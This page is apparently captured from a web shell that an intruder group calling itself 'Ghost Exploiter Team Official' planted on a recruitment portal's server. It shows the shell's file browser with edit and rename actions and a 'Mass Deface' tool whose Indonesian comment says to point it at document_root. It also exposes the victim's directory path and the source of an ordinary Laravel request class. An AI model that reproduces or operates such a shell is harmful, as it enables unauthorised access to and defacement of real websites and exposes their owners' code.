webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
aminiwrc
/
portal.aminikamanpower.com
/
app
/
Http
/
Requests
/
InterviewSchedule
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
StoreRequest.php
0.851KB
edt
ren
UpdateRequest.php
0.642KB
edt
ren
<?php namespace App\Http\Requests\InterviewSchedule; use App\Http\Requests\CoreRequest; class UpdateRequest extends CoreRequest { /** * Determine if the user is authorized to make this request. * * @return bool */ public function authorize() { return true; } /** * Get the validation rules that apply to the request. * * @return array */ public function rules() { return [ "candidate_id" => "required", "employee.0" => "required", "scheduleDate" => "required", "scheduleTime" => "required", ]; } }
<=Back
Liking